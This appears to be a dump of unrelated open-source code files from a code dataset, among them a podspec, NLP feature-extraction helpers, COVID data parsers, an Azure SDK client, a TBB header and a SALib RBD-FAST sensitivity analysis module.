max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
5,169 |
{
"name": "JDKeplerSDK-wsgw",
"version": "2.2.5",
"summary": "京东开普勒sdk(网上国网).",
"description": "京东开普勒SDK(网上国网:com.wsgw.zsdl95598)",
"homepage": "https://github.com/kevincwt/JDKeplerSDK-wsgw.git",
"license": {
"type": "MIT",
"file": "LICENSE"
},
"authors": {
"wtchang": "<EMAIL>"
},
"platforms": {
"ios": "10.0"
},
"source": {
"git": "https://github.com/kevincwt/JDKeplerSDK-wsgw.git",
"tag": "2.2.5"
},
"resources": "Framework/Kepler.bundle",
"ios": {
"vendored_frameworks": "Framework/JDKeplerSDK.framework"
},
"frameworks": [
"UIKit",
"Foundation",
"JavaScriptCore",
"SystemConfiguration"
],
"libraries": [
"z",
"sqlite3.0"
],
"deprecated": true
}
| 395 |
11,433 |
<gh_stars>1000+
from allennlp.data.tokenizers import CharacterTokenizer
tokenizer = CharacterTokenizer()
passage = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor "
"incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis "
"nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu "
"fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in "
"culpa qui officia deserunt mollit anim id est laborum."
)
def bench_character_tokenizer(benchmark):
benchmark(tokenizer.tokenize, passage)
| 255 |
5,129 |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import tempfile
import unittest
import torch
from fairseq.data import Dictionary
class TestDictionary(unittest.TestCase):
def test_finalize(self):
txt = [
'A B C D',
'B C D',
'C D',
'D',
]
ref_ids1 = list(map(torch.IntTensor, [
[4, 5, 6, 7, 2],
[5, 6, 7, 2],
[6, 7, 2],
[7, 2],
]))
ref_ids2 = list(map(torch.IntTensor, [
[7, 6, 5, 4, 2],
[6, 5, 4, 2],
[5, 4, 2],
[4, 2],
]))
# build dictionary
d = Dictionary()
for line in txt:
d.encode_line(line, add_if_not_exist=True)
def get_ids(dictionary):
ids = []
for line in txt:
ids.append(dictionary.encode_line(line, add_if_not_exist=False))
return ids
def assertMatch(ids, ref_ids):
for toks, ref_toks in zip(ids, ref_ids):
self.assertEqual(toks.size(), ref_toks.size())
self.assertEqual(0, (toks != ref_toks).sum().item())
ids = get_ids(d)
assertMatch(ids, ref_ids1)
# check finalized dictionary
d.finalize()
finalized_ids = get_ids(d)
assertMatch(finalized_ids, ref_ids2)
# write to disk and reload
with tempfile.NamedTemporaryFile(mode='w') as tmp_dict:
d.save(tmp_dict.name)
d = Dictionary.load(tmp_dict.name)
reload_ids = get_ids(d)
assertMatch(reload_ids, ref_ids2)
assertMatch(finalized_ids, reload_ids)
if __name__ == '__main__':
unittest.main()
| 981 |
561 |
<filename>app/css.py<gh_stars>100-1000
# Copyright 2013 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from model import *
from utils import *
class Handler(BaseHandler):
repo_required = False
ignore_deactivation = True
def get(self):
self.response.headers['Content-Type'] = 'text/css; charset=utf-8'
if self.env.ui in ['small', 'light']:
template_name = 'css-%s' % self.env.ui
else:
template_name = 'css-default'
self.render(
template_name,
start='right' if self.env.rtl else 'left',
end='left' if self.env.rtl else 'right')
| 409 |
5,937 |
<gh_stars>1000+
// Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MIT license.
// See the LICENSE file in the project root for more information.
#pragma once
#include "dxlcommon.hpp"
#include <d3d9types.h>
#include <DirectXMath.h>
namespace dxlayer
{
// D3DX9 compatible base types.
//
// These definitions will stand-in for platform-specific types
// used in our implementation of wpfgfx.
//
// We use D3DX9 compatible (in terms of size and layout) types here
// rather than the types supplied by the DirectX Math library
// because our codebase depends on such conformity. For e.g.,
// there are places in our codebase where we pass around arrays of
// objects as a BYTE* and reinterpret_cast<> as needed, do pointer
// arithmetic on such BYTE* pointers etc.
//
// Note:
// The individual types declared below are defined
// in base/<typename>.hpp, and are all included in
// factories/xmfactory.hpp
template<>
struct basetypes<dxapi::xmath>
{
// Describes a two-component vector, and includes
// constructors and operators compatible with the
// D3DXVECTOR2 type.
struct vector2_base_t;
// Describes a three-component vector, and includes
// constructors and operators compatible with the
// D3DXVECTOR3 type.
struct vector3_base_t;
// Describes a three-component vector, and includes
// constructors and operators compatible with the
// D3DXVECTOR3 type.
struct vector4_base_t;
// Describes a quaternion that is
// compatible in size and layout with D3DXQUATERNION
struct quaternion_base_t;
// Describes a 4x4 matrix
// This is based on the D3DMATRIX types
struct matrix_base_t;
// Describes color values in a manner compatible
// in size and layout with D3DCOLORVALUE struct and
// D3DXCOLOR extensions.
struct color_base_t;
};
}
| 773 |
348 |
<reponame>chamberone/Leaflet.PixiOverlay<gh_stars>100-1000
{"nom":"Charnas","circ":"2ème circonscription","dpt":"Ardèche","inscrits":639,"abs":339,"votants":300,"blancs":12,"nuls":4,"exp":284,"res":[{"nuance":"SOC","nom":"<NAME>","voix":213},{"nuance":"REM","nom":"<NAME>","voix":71}]}
| 119 |
644 |
{
"name": "frint-data-validation",
"version": "5.7.2",
"description": "Validation for Models in FrintJS",
"main": "lib/index.js",
"homepage": "https://github.com/frintjs/frint/tree/master/packages/frint-data-validation",
"scripts": {
"lint": "cross-env ../../node_modules/.bin/eslint --color '{src,test}/**/*.js'",
"transpile": "cross-env ../../node_modules/.bin/babel src --out-dir lib",
"test": "cross-env ../../node_modules/.bin/mocha --colors --compilers js:babel-register --recursive ./src/**/*.spec.js",
"cover:run": "cross-env ../../node_modules/.bin/nyc --reporter=json --require babel-register ../../node_modules/.bin/mocha --colors --compilers js:babel-register --recursive ./src/**/*.spec.js",
"cover:report": "cross-env ../../node_modules/.bin/nyc report",
"cover": "npm run cover:run && npm run cover:report",
"dist:lib": "cross-env ../../node_modules/.bin/webpack --config ./webpack.config.js",
"dist:min": "cross-env DIST_MIN=1 ../../node_modules/.bin/webpack --config ./webpack.config.js",
"dist": "npm run dist:lib && npm run dist:min",
"prepublish": "npm run transpile"
},
"repository": {
"type": "git",
"url": "git+https://github.com/frintjs/frint.git"
},
"author": "FrintJS Authors (https://github.com/frintjs/frint/graphs/contributors)",
"keywords": [
"frint"
],
"bugs": {
"url": "https://github.com/frintjs/frint/issues"
},
"dependencies": {
"lodash": "^4.13.1",
"rxjs": "^5.5.0"
},
"devDependencies": {
"cross-env": "^5.0.5",
"frint-config": "^5.7.2",
"frint-data": "^5.7.2"
},
"license": "MIT"
}
| 689 |
430 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from pathlib import Path
from typing import Any, Dict, List
from pandas import DataFrame, concat
from lib.cast import age_group, safe_int_cast
from lib.data_source import DataSource
from lib.io import read_file
from lib.constants import SRC
from lib.concurrent import thread_map
from lib.time import datetime_isoformat
from lib.utils import table_rename
_dashboard_column_adapter = {
"key": "key",
"date": "date",
"casConfirmes": "total_confirmed",
"deces": "total_deceased",
"testsPositifs": "new_confirmed",
"testsRealises": "new_tested",
"gueris": "new_recovered",
"hospitalises": "current_hospitalized",
"reanimation": "current_intensive_care",
}
_gouv_column_adapter = {
"date": "date",
"dep": "subregion2_code",
"reg": "subregion1_code",
"hosp": "current_hospitalized",
"incid_hosp": "new_hospitalized",
"rea": "current_intensive_care",
"incid_rea": "new_intensive_care",
"dc_tot": "total_deceased",
"conf": "total_confirmed",
"conf_j1": "new_confirmed",
}
def _get_region(
url_tpl: str, column_adapter: Dict[str, str], iso_map: Dict[str, str], subregion1_code: str
):
code = iso_map[subregion1_code]
data = read_file(url_tpl.format(code))
data["key"] = f"FR_{subregion1_code}"
return table_rename(data, column_adapter, drop=True)
def _get_department(url_tpl: str, column_adapter: Dict[str, str], record: Dict[str, str]):
subregion1_code = record["subregion1_code"]
subregion2_code = record["subregion2_code"]
code = f"DEP-{subregion2_code}"
data = read_file(url_tpl.format(code))
data["key"] = f"FR_{subregion1_code}_{subregion2_code}"
return table_rename(data, column_adapter, drop=True)
def _get_country(url_tpl: str, column_adapter: Dict[str, str]):
data = read_file(url_tpl.format("FRA"))
data["key"] = "FR"
return table_rename(data, column_adapter, drop=True)
class FranceDashboardDataSource(DataSource):
def fetch(
self,
output_folder: Path,
cache: Dict[str, str],
fetch_opts: List[Dict[str, Any]],
skip_existing: bool = False,
) -> Dict[Any, str]:
# URL is just a template, so pass-through the URL to parse manually
return {idx: source["url"] for idx, source in enumerate(fetch_opts)}
def parse(self, sources: Dict[Any, str], aux: Dict[str, DataFrame], **parse_opts) -> DataFrame:
url_tpl = sources[0]
metadata = aux["metadata"]
metadata = metadata[metadata["country_code"] == "FR"]
fr_isos = read_file(SRC / "data" / "fr_iso_codes.csv")
fr_iso_map = {iso: code for iso, code in zip(fr_isos["iso_code"], fr_isos["region_code"])}
fr_codes = metadata[["subregion1_code", "subregion2_code"]].dropna()
regions_iter = fr_codes["subregion1_code"].unique()
deps_iter = [record for _, record in fr_codes.iterrows()]
# For country level, there is no need to estimate confirmed from tests
column_adapter_country = dict(_dashboard_column_adapter)
column_adapter_country.pop("testsPositifs")
# Get country level data
country = _get_country(url_tpl, column_adapter_country)
# Country level data has totals instead of diffs, so we compute the diffs by hand
country.sort_values("date", inplace=True)
country["new_confirmed"] = country["total_confirmed"].diff()
country.drop(columns=["total_confirmed"], inplace=True)
# For region level, we can only estimate confirmed from tests
column_adapter_region = dict(_dashboard_column_adapter)
column_adapter_region.pop("casConfirmes")
# Get region level data
get_region_func = partial(_get_region, url_tpl, column_adapter_region, fr_iso_map)
regions = concat(list(thread_map(get_region_func, regions_iter)))
# Get department level data
get_department_func = partial(_get_department, url_tpl, column_adapter_region)
departments = concat(list(thread_map(get_department_func, deps_iter)))
data = concat([country, regions, departments])
data["date"] = data["date"].apply(lambda x: datetime_isoformat(x, "%Y-%m-%d %H:%M:%S"))
return data.sort_values("date")
class FranceStratifiedDataSource(FranceDashboardDataSource):
def parse(self, sources: Dict[Any, str], aux: Dict[str, DataFrame], **parse_opts) -> DataFrame:
url_tpl = sources[0]
metadata = aux["metadata"]
metadata = metadata[metadata["country_code"] == "FR"]
fr_isos = read_file(SRC / "data" / "fr_iso_codes.csv")
fr_iso_map = {iso: code for iso, code in zip(fr_isos["iso_code"], fr_isos["region_code"])}
fr_codes = metadata[["subregion1_code", "subregion2_code"]].dropna()
regions_iter = fr_codes["subregion1_code"].unique()
deps_iter = [record for _, record in fr_codes.iterrows()]
column_adapter = {
"key": "key",
"date": "date",
"testsRealisesDetails": "_breakdown_tested",
"testsPositifsDetails": "_breakdown_confirmed",
}
# Get country level data
country = _get_country(url_tpl, column_adapter)
# Get region level data
get_region_func = partial(_get_region, url_tpl, column_adapter, fr_iso_map)
regions = concat(list(thread_map(get_region_func, regions_iter)))
# Get department level data
get_department_func = partial(_get_department, url_tpl, column_adapter)
departments = concat(list(thread_map(get_department_func, deps_iter)))
data = concat([country, regions, departments])
data["date"] = data["date"].apply(lambda x: datetime_isoformat(x, "%Y-%m-%d %H:%M:%S"))
data["_breakdown_tested"].fillna("", inplace=True)
data["_breakdown_confirmed"].fillna("", inplace=True)
records: Dict[str, List] = {"confirmed": [], "tested": []}
for key, row in data.set_index("key").iterrows():
for statistic in records.keys():
if row[f"_breakdown_{statistic}"] != "":
for item in row[f"_breakdown_{statistic}"]:
records[statistic].append(
{
"key": key,
"date": row["date"],
"age": item["age"],
"sex": item.get("sexe"),
f"new_{statistic}": item["value"],
}
)
df1 = DataFrame.from_records(records["tested"])
df2 = DataFrame.from_records(records["confirmed"])
data = df1.merge(df2, how="outer")
data = data[~data["age"].isin(["0", "A", "B", "C", "D", "E"])]
data["age"] = data["age"].apply(lambda x: age_group(safe_int_cast(x)))
sex_adapter = lambda x: {"h": "male", "f": "female"}.get(x, "sex_unknown")
data["sex"] = data["sex"].apply(sex_adapter)
return data
class FranceCountryDataSource(DataSource):
def parse_dataframes(
self, dataframes: Dict[Any, DataFrame], aux: Dict[str, DataFrame], **parse_opts
) -> DataFrame:
data = table_rename(dataframes[0], _gouv_column_adapter, drop=True)
data["key"] = "FR"
return data
| 3,345 |
6,989 |
/*
Copyright (c) 2020-2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#ifndef __TBB_small_object_pool_impl_H
#define __TBB_small_object_pool_impl_H
#include "oneapi/tbb/detail/_small_object_pool.h"
#include "oneapi/tbb/detail/_utils.h"
#include <cstddef>
#include <cstdint>
#include <atomic>
namespace tbb {
namespace detail {
namespace r1 {
class thread_data;
class small_object_pool_impl : public d1::small_object_pool
{
static constexpr std::size_t small_object_size = 256;
struct small_object {
small_object* next;
};
static small_object* const dead_public_list;
public:
void* allocate_impl(small_object_pool*& allocator, std::size_t number_of_bytes);
void deallocate_impl(void* ptr, std::size_t number_of_bytes, thread_data& td);
void destroy();
private:
static std::int64_t cleanup_list(small_object* list);
~small_object_pool_impl() = default;
private:
alignas(max_nfs_size) small_object* m_private_list;
std::int64_t m_private_counter{};
alignas(max_nfs_size) std::atomic<small_object*> m_public_list;
std::atomic<std::int64_t> m_public_counter{};
};
} // namespace r1
} // namespace detail
} // namespace tbb
#endif /* __TBB_small_object_pool_impl_H */
| 626 |
1,350 |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.resourcemanager.devtestlabs.implementation;
import com.azure.core.http.rest.PagedIterable;
import com.azure.core.http.rest.Response;
import com.azure.core.http.rest.SimpleResponse;
import com.azure.core.util.Context;
import com.azure.core.util.logging.ClientLogger;
import com.azure.resourcemanager.devtestlabs.fluent.VirtualMachineSchedulesClient;
import com.azure.resourcemanager.devtestlabs.fluent.models.ScheduleInner;
import com.azure.resourcemanager.devtestlabs.models.Schedule;
import com.azure.resourcemanager.devtestlabs.models.ScheduleFragment;
import com.azure.resourcemanager.devtestlabs.models.VirtualMachineSchedules;
import com.fasterxml.jackson.annotation.JsonIgnore;
public final class VirtualMachineSchedulesImpl implements VirtualMachineSchedules {
@JsonIgnore private final ClientLogger logger = new ClientLogger(VirtualMachineSchedulesImpl.class);
private final VirtualMachineSchedulesClient innerClient;
private final com.azure.resourcemanager.devtestlabs.DevTestLabsManager serviceManager;
public VirtualMachineSchedulesImpl(
VirtualMachineSchedulesClient innerClient,
com.azure.resourcemanager.devtestlabs.DevTestLabsManager serviceManager) {
this.innerClient = innerClient;
this.serviceManager = serviceManager;
}
public PagedIterable<Schedule> list(String resourceGroupName, String labName, String virtualMachineName) {
PagedIterable<ScheduleInner> inner = this.serviceClient().list(resourceGroupName, labName, virtualMachineName);
return Utils.mapPage(inner, inner1 -> new ScheduleImpl(inner1, this.manager()));
}
public PagedIterable<Schedule> list(
String resourceGroupName,
String labName,
String virtualMachineName,
String expand,
String filter,
Integer top,
String orderby,
Context context) {
PagedIterable<ScheduleInner> inner =
this
.serviceClient()
.list(resourceGroupName, labName, virtualMachineName, expand, filter, top, orderby, context);
return Utils.mapPage(inner, inner1 -> new ScheduleImpl(inner1, this.manager()));
}
public Schedule get(String resourceGroupName, String labName, String virtualMachineName, String name) {
ScheduleInner inner = this.serviceClient().get(resourceGroupName, labName, virtualMachineName, name);
if (inner != null) {
return new ScheduleImpl(inner, this.manager());
} else {
return null;
}
}
public Response<Schedule> getWithResponse(
String resourceGroupName,
String labName,
String virtualMachineName,
String name,
String expand,
Context context) {
Response<ScheduleInner> inner =
this.serviceClient().getWithResponse(resourceGroupName, labName, virtualMachineName, name, expand, context);
if (inner != null) {
return new SimpleResponse<>(
inner.getRequest(),
inner.getStatusCode(),
inner.getHeaders(),
new ScheduleImpl(inner.getValue(), this.manager()));
} else {
return null;
}
}
public Schedule createOrUpdate(
String resourceGroupName, String labName, String virtualMachineName, String name, ScheduleInner schedule) {
ScheduleInner inner =
this.serviceClient().createOrUpdate(resourceGroupName, labName, virtualMachineName, name, schedule);
if (inner != null) {
return new ScheduleImpl(inner, this.manager());
} else {
return null;
}
}
public Response<Schedule> createOrUpdateWithResponse(
String resourceGroupName,
String labName,
String virtualMachineName,
String name,
ScheduleInner schedule,
Context context) {
Response<ScheduleInner> inner =
this
.serviceClient()
.createOrUpdateWithResponse(resourceGroupName, labName, virtualMachineName, name, schedule, context);
if (inner != null) {
return new SimpleResponse<>(
inner.getRequest(),
inner.getStatusCode(),
inner.getHeaders(),
new ScheduleImpl(inner.getValue(), this.manager()));
} else {
return null;
}
}
public void delete(String resourceGroupName, String labName, String virtualMachineName, String name) {
this.serviceClient().delete(resourceGroupName, labName, virtualMachineName, name);
}
public Response<Void> deleteWithResponse(
String resourceGroupName, String labName, String virtualMachineName, String name, Context context) {
return this.serviceClient().deleteWithResponse(resourceGroupName, labName, virtualMachineName, name, context);
}
public Schedule update(
String resourceGroupName, String labName, String virtualMachineName, String name, ScheduleFragment schedule) {
ScheduleInner inner =
this.serviceClient().update(resourceGroupName, labName, virtualMachineName, name, schedule);
if (inner != null) {
return new ScheduleImpl(inner, this.manager());
} else {
return null;
}
}
public Response<Schedule> updateWithResponse(
String resourceGroupName,
String labName,
String virtualMachineName,
String name,
ScheduleFragment schedule,
Context context) {
Response<ScheduleInner> inner =
this
.serviceClient()
.updateWithResponse(resourceGroupName, labName, virtualMachineName, name, schedule, context);
if (inner != null) {
return new SimpleResponse<>(
inner.getRequest(),
inner.getStatusCode(),
inner.getHeaders(),
new ScheduleImpl(inner.getValue(), this.manager()));
} else {
return null;
}
}
public void execute(String resourceGroupName, String labName, String virtualMachineName, String name) {
this.serviceClient().execute(resourceGroupName, labName, virtualMachineName, name);
}
public void execute(
String resourceGroupName, String labName, String virtualMachineName, String name, Context context) {
this.serviceClient().execute(resourceGroupName, labName, virtualMachineName, name, context);
}
private VirtualMachineSchedulesClient serviceClient() {
return this.innerClient;
}
private com.azure.resourcemanager.devtestlabs.DevTestLabsManager manager() {
return this.serviceManager;
}
}
| 2,623 |
1,756 |
"""
** deeplean-ai.com **
** dl-lab **
created by :: GauravBh1010tt
"""
import pandas as pd
import numpy as np
import re
#from tqdm import tqdm
from nltk.corpus import wordnet
from nltk import bigrams, trigrams
from collections import Counter, defaultdict
from gensim.models import Word2Vec
from scipy.spatial.distance import cosine as cos
from stop_words import get_stop_words
from gensim import corpora, models
from nltk.tokenize import RegexpTokenizer
tokenizer = RegexpTokenizer(r'\w+')
def tokenize(sent):
return [x.strip() for x in re.split('(\W+)?', sent) if x.strip()]
#Number Of Words In A String(Returns Integer):
def length(val):
return len(val.split())
#Whether A String Is Subset Of Other(Returns 1 and 0):
def substringCheck(sen_A, sen_B):
if sen_A in sen_B or sen_B in sen_A:
return 1
else:
return 0
#Number Of Same Words In Two Sentences(Returns Float):
def overlap(sen_A, sen_B):
a = sen_A.split()
b = sen_B.split()
count = 0
for word_a in a:
for word_b in b:
if(word_a == word_b):
count += 1
return count
#Number Of Synonyms In Two Sentences(Returns Float):
def overlapSyn(sen_A, sen_B):
a = sen_A.split()
b = sen_B.split()
word_synonyms = []
for word in a:
for synset in wordnet.synsets(word):
for lemma in synset.lemma_names():
if lemma in b and lemma != word:
word_synonyms.append(lemma)
return len(word_synonyms)
#Forming Bag Of Words[BOW][Returns BOW Dictionary]:
def train_BOW(lst):
temp = []
for sent in lst:
temp.extend(sent.split())
counts = Counter(temp)
total_count = len(set(temp))
for word in counts:
counts[word] /= float(total_count)
return counts
#Sum Of BOW Values For A Sent[Returns Float]:
def Sum_BOW(sent, dic):
tot = 0.0
for word in sent.split():
try:
tot += dic[word]
except:
continue
return tot
#Training Bigram Model[Returns Dictionary of Dictionaries]:
def train_bigram(lst):
model = defaultdict(lambda: defaultdict(lambda: 0))
for sent in lst:
sent = sent.split()
for w1, w2 in bigrams(sent, pad_right=True, pad_left=True):
model[w1][w2] += 1
total_count = 0
for w1 in model:
total_count = float(sum(model[w1].values()))
for w2 in model[w1]:
model[w1][w2] /= total_count
return model
#Total Sum Of Bigram Probablity Of A Sentence[Returns Float]:
def sum_bigram(sent, model):
sent = sent.split()
first = True
tot = 0
for i in range(len(sent)):
try:
if first:
tot += model[None][sent[i]]
first = False
else:
tot += model[sent[i-1]][sent[i]]
except:
continue
return tot
#Training Trigram Model[Returns Dictionary of Dictionaries]:
def train_trigram(lst):
model = defaultdict(lambda: defaultdict(lambda: 0))
for sent in lst:
sent = sent.split()
for w1, w2, w3 in trigrams(sent, pad_right=True, pad_left=True):
model[(w1,w2)][w2] += 1
total_count = 0
for w1,w2 in model:
total_count = float(sum(model[(w1, w2)].values()))
for w3 in model[(w1,w2)]:
model[(w1, w2)][w3] /= total_count
#Total Sum Of Trigram Probablity Of A Sentence[Returns Float]:
def sum_trigram(sent, model):
sent = sent.split()
first = True
second = True
tot = 0
for i in range(len(sent)):
try:
if first:
tot += model[None, None][sent[i]]
first = False
elif second:
tot += model[None, sent[i-1]][sent[i]]
second = False
else:
tot += model[sent[i-2], sent[i-1]][sent[i]]
except:
continue
return tot
#Word2Vec Training(Returns Vector):
def W2V_train(lst1, lst2):
vocab = []
for i in range(len(lst1)):
w1 = lst1[i]
w2 = lst2[i]
vocab.append(w1.split())
vocab.append(w2.split())
for temp in vocab:
for j in range(len(temp)):
temp[j] = temp[j].lower()
return Word2Vec(vocab)
#Returns The Difference Between Word2Vec Sum Of All The Words In Two Sentences(Returns Vec):
def W2V_Vec(sent_A, sent_B, vec):
if len(sent_A) <= 1:
sent_A += 'none'
elif len(sent_B) <= 1:
sent_B += 'none'
vec1 = 0
vec2 = 0
sent_A = tokenize(sent_A)
sent_B = tokenize(sent_B)
for word in sent_A:
if word not in ", . ? ! # $ % ^ & * ( ) { } [ ]".split():
try:
vec1 += vec[word]
except:
continue
for word in sent_B:
if word not in ", . ? ! # $ % ^ & * ( ) { } [ ]".split():
try:
vec2 += vec[word]
except:
continue
try:
result = cos(vec1, vec2)
except:
result = 0.0
if np.isnan(result):
return 0.0
else:
return result
#Trains LDA Model (Returns Model):
def LDA_train(doc):
red = []
en_stop = get_stop_words('en')
for d in doc:
try:
raw = d.lower()
tokens = tokenizer.tokenize(raw)
stopped_tokens = [i for i in tokens if not i in en_stop]
red.append(stopped_tokens)
except:
continue
print("Forming Dictionary.....")
dictionary = corpora.Dictionary(red)
print("Forming Corpus.....")
corpus = [dictionary.doc2bow(text) for text in red]
print("Training Model.....")
lda = models.ldamodel.LdaModel(corpus, num_topics=10, id2word = dictionary, passes=1)
return lda
#Returns Average Of Probablity Of Word Present In LDA Model For Input Document(Returns Float):
def LDA(doc1, doc2, lda):
word = pd.DataFrame()
weight = pd.DataFrame()
vec1 = []
vec2 = []
for i in range(10):
vec1.append(0)
vec2.append(0)
for i in range(10):
a = []
wrd = []
wgt = []
for x in lda.print_topic(i).split():
if x != '+':
a.append(x)
for w in a:
t = w.split("*")
wrd.append(t[1][1:-1])
wgt.append(float(t[0]))
word[i] = wrd
weight[i] = wgt
num = 0
wrd1 = []
wrd2 = []
# print 'Vector Formation for doc1.....'
for d in doc1.split():
for i in range(10):
for j in range(10):
if d.lower() == word[i][j]:
vec1[j] += float(weight[i][j])
wrd1.append(word[i][j])
# print 'Vector Formation for doc2.....'
for d in doc2.split():
for i in range(10):
for j in range(10):
if d.lower() == word[i][j]:
vec2[i] += float(weight[i][j])
wrd2.append(word[i][j])
v1 = 0.0
v2 = 0.0
for i in range(10):
if vec1[i] >= v1:
t1 = i
v1 = vec1[i]
if vec2[i] >= v2:
t2 = i
v2 = vec2[i]
wrd1_list = list(set(wrd1))
wrd2_list = list(set(wrd2))
w1_len = len(wrd1_list)
w2_len = len(wrd2_list)
w1_new = []
w2_new = []
for i in range(w1_len):
d = wrd1_list[i]
for i in range(10):
if d != word[t2][i]:
w1_new.append(d)
for i in range(w2_len):
d = wrd2_list[i]
for i in range(10):
if d != word[t1][i]:
w2_new.append(d)
num = len(list(set(w1_new))) + len(set(w2_new))
try:
return num
except:
return 0.0
| 3,947 |
515 |
<gh_stars>100-1000
# Copyright (c) 2013-2021 <NAME>
# License: MIT License
from pathlib import Path
import ezdxf
OUTBOX = Path("~/Desktop/Outbox").expanduser()
doc = ezdxf.new("R2007", setup=True)
msp = doc.modelspace()
attribs = {
"char_height": 0.7,
"width": 5.0,
"style": "OpenSans",
}
msp.add_line((-10, -1), (10, -2))
mtext = msp.add_mtext("This is a long MTEXT line with line wrapping!", attribs)
mtext.set_bg_color((108, 204, 193))
# line break \P
msp.add_mtext("Line 1\\PLine 2", attribs).set_location(insert=(0, 10))
attribs["width"] = 15
text = (
"normal \\Oover strike\\o normal\\Pnormal \\Kstrike trough\\k normal"
"\\Pnormal \\Lunder line\\l normal"
)
msp.add_mtext(text, attribs).set_location(insert=(0, 15))
# see example "mtext_editor.py" how to use the MTextEditor to create the same
# result without complicated escape sequences.
filename = "mtext.dxf"
doc.saveas(OUTBOX / filename)
print(f"saved {filename}")
| 374 |
573 |
<gh_stars>100-1000
#!/usr/bin/env python
# coding=utf8
import numpy as np
from scipy.signal import periodogram
from scipy.stats import norm
from . import common_args
from ..util import read_param_file, ResultDict
def analyze(problem, X, Y, M=10, num_resamples=100, conf_level=0.95, print_to_console=False, seed=None):
"""Performs the Random Balanced Design - Fourier Amplitude Sensitivity Test
(RBD-FAST) on model outputs.
Returns a dictionary with keys 'S1', where each entry is a list of
size D (the number of parameters) containing the indices in the same order
as the parameter file.
Notes
-----
Compatible with:
all samplers
Parameters
----------
problem : dict
The problem definition
X : numpy.array
A NumPy array containing the model inputs
Y : numpy.array
A NumPy array containing the model outputs
M : int
The interference parameter, i.e., the number of harmonics to sum in
the Fourier series decomposition (default 10)
print_to_console : bool
Print results directly to console (default False)
References
----------
.. [1] <NAME>, <NAME> and <NAME> (2006) "Random Balance Designs
for the Estimation of First Order Global Sensitivity Indices",
Reliability Engineering and System Safety, 91:6, 717-727
.. [2] <NAME> (2010) "An effective algorithm for computing global
sensitivity indices (EASI) Reliability Engineering & System Safety",
95:4, 354-360. doi:10.1016/j.ress.2009.11.005
.. [3] <NAME>, <NAME> (2012) "Bias correction for the
estimation of sensitivity indices based on random balance designs.",
Reliability Engineering and System Safety, Elsevier, 107, 205-213.
doi:10.1016/j.ress.2012.06.010
.. [4] <NAME>, <NAME> & <NAME> (2015)
"Uncertainty and sensitivity analysis applied to hygrothermal
simulation of a brick building in a hot and humid climate",
Journal of Building Performance Simulation.
doi:10.1080/19401493.2015.1112430
Examples
--------
>>> X = latin.sample(problem, 1000)
>>> Y = Ishigami.evaluate(X)
>>> Si = rbd_fast.analyze(problem, X, Y, print_to_console=False)
"""
if seed:
np.random.seed(seed)
D = problem['num_vars']
N = Y.size
# Calculate and Output the First Order Value
Si = ResultDict((k, [None] * D) for k in ['S1', 'S1_conf'])
Si['names'] = problem['names']
for i in range(D):
S1 = compute_first_order(permute_outputs(X[:, i], Y), M)
S1 = unskew_S1(S1, M, N)
Si['S1'][i] = S1
Si['S1_conf'][i] = bootstrap(X[:, i], Y, M, num_resamples, conf_level)
if print_to_console:
print(Si.to_df())
return Si
def permute_outputs(X, Y):
"""
Permute the output according to one of the inputs as in [_2]
References
----------
.. [2] <NAME> (2010) "An effective algorithm for computing global
sensitivity indices (EASI) Reliability Engineering & System Safety",
95:4, 354-360. doi:10.1016/j.ress.2009.11.005
"""
permutation_index = np.argsort(X)
permutation_index = np.concatenate([permutation_index[::2],
permutation_index[1::2][::-1]])
return Y[permutation_index]
def compute_first_order(permuted_outputs, M):
_, Pxx = periodogram(permuted_outputs)
V = np.sum(Pxx[1:])
D1 = np.sum(Pxx[1: M + 1])
return D1 / V
def unskew_S1(S1, M, N):
"""
Unskew the sensivity indice
(<NAME>, <NAME> (2012) "Bias correction for the
estimation of sensitivity indices based on random balance designs.",
Reliability Engineering and System Safety, Elsevier, 107, 205-213.
doi:10.1016/j.ress.2012.06.010)
"""
lamb = (2 * M) / N
return S1 - lamb / (1 - lamb) * (1 - S1)
def bootstrap(X_d, Y, M, resamples, conf_level):
# Use half of available data each time
T_data = X_d.shape[0]
n_size = int(T_data * 0.5)
res = np.zeros(resamples)
for i in range(resamples):
sample_idx = np.random.choice(T_data, replace=True, size=n_size)
X_rs, Y_rs = X_d[sample_idx], Y[sample_idx]
S1 = compute_first_order(permute_outputs(X_rs, Y_rs), M)
S1 = unskew_S1(S1, M, Y_rs.size)
res[i] = S1
return norm.ppf(0.5 + conf_level / 2.0) * res.std(ddof=1)
def cli_parse(parser):
parser.add_argument('-X', '--model-input-file',
type=str, required=True, help='Model input file')
parser.add_argument('-M', '--M', type=int, required=False,
default=10,
help='Inference parameter')
